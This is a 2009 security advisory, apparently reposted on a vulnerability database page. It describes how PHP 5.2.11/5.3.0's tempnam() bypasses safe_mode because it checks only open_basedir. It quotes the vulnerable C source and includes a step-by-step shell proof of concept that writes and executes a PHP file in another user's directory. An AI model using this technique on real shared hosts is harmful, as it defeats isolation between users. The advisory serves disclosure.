PHP 5.2.11 tempnam() safe_mode bypass

2009-09-29 / 2009-09-30
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-264


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

[ PHP 5.2.11/5.3.0 (file.c) Safe-mode bypass ] Author: Grzegorz Stachowiak Date: - - Dis.: 23.09.2009 - - Pub.: 29.09.2009 Risk: Medium Affected Software: - - PHP 5.2.11 and prior - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. http://lu2.php.net/manual/en/function.tempnam.php - --- 1. PHP 5.2.11/5.3.0 (file.c) Safe-mode bypass --- The main problem exist in function tempnam() which check only open_basedir value. We can create any file with PHP code, in any writable folder. - ---ext/standard/file.c--- PHP_FUNCTION(tempnam) { char *dir, *prefix; int dir_len, prefix_len; size_t p_len; char *opened_path; char *p; int fd; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "ss", &dir, &dir_len, &prefix, &prefix_len) == FAILURE) { return; } if (php_check_open_basedir(dir TSRMLS_CC)) { [1] RETURN_FALSE; } php_basename(prefix, prefix_len, NULL, 0, &p, &p_len TSRMLS_CC); if (p_len > 64) { p[63] = '\0'; } if ((fd = php_open_temporary_fd(dir, p, &opened_path TSRMLS_CC)) >= 0) { close(fd); RETVAL_STRING(opened_path, 0); } efree(p); } - ---ext/standard/file.c--- [1]. Function tempnam() check only open_basedir value. - ---example0 (5.2.11/5.3.0)--- x@x-desktop:/var/www/bypass# php -v PHP 5.3.0 (cli) (built: Sep 22 2009 14:06:39) Copyright (c) 1997-2009 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2009 Zend Technologies |----------------------------------------------------------------| x@x-desktop:/var/www/bypass# php -r "echo ini_get('safe_mode')" 1 |----------------------------------------------------------------| y@x-desktop:~/www$ ls -la total 8 drwxrwxrwx 2 y y 4096 2009-09-27 19:11 . drwxr-xr-x 9 y y 4096 2009-09-27 19:11 .. x@x-desktop:/var/www/bypass$ id uid=1000(x) gid=1000(x) |----------------------------------------------------------------| x@x-desktop:/var/www/bypass$ php -r "fopen('/home/y/www/safe_mode_bypass.php','a+');" 1 Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is 1000 is not allowed to access /home/y/www/ owned by uid 1001 in Command line code on line 1 Warning: fopen(/home/y/www/safe_mode_bypass.php): failed to open stream: No such file or directory in Command line code on line 1 |----------------------------------------------------------------| x@x-desktop:/var/www/bypass$ php -r "tempnam('/home/y/www/','safe_mode_bypass.php.');" x@x-desktop:/var/www/bypass$ ls -la /home/y/www/ total 8 drwxrwxrwx 2 y y 4096 2009-09-27 19:15 . drwxr-xr-x 9 y y 4096 2009-09-27 19:11 .. -rw------- 1 x x 0 2009-09-27 19:15 safe_mode_bypass.php.SUT2N3 |----------------------------------------------------------------| x@x-desktop:/var/www/bypass$ php -r "file_put_contents('/home/y/www/safe_mode_bypass.php.SUT2Nb','<?php echo getcwd(); ?>');" x@x-desktop:/var/www/bypass$ cat /home/y/www/safe_mode_bypass.php.SUT2Nb <?php echo getcwd(); ?> |----------------------------------------------------------------| x@x-desktop:/var/www/bypass$ php -r "chmod('/home/y/www/safe_mode_bypass.php.SUT2Nb',0755);" x@x-desktop:/var/www$ curl http://localhost/safe_mode_bypass.php.SUT2Nb /home/y/www |----------------------------------------------------------------| File has been executed as PHP file, because extension .SUT2Nb do not exist, so Apache "search" other extension in filename, in this instance .php . - --- 3. Contact --- Author: Grzegorz Stachowiak Email: stachowiak {a|t} analogicode.pl

References:

http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/standard/file.c?view=log
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/standard/file.c?view=log


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top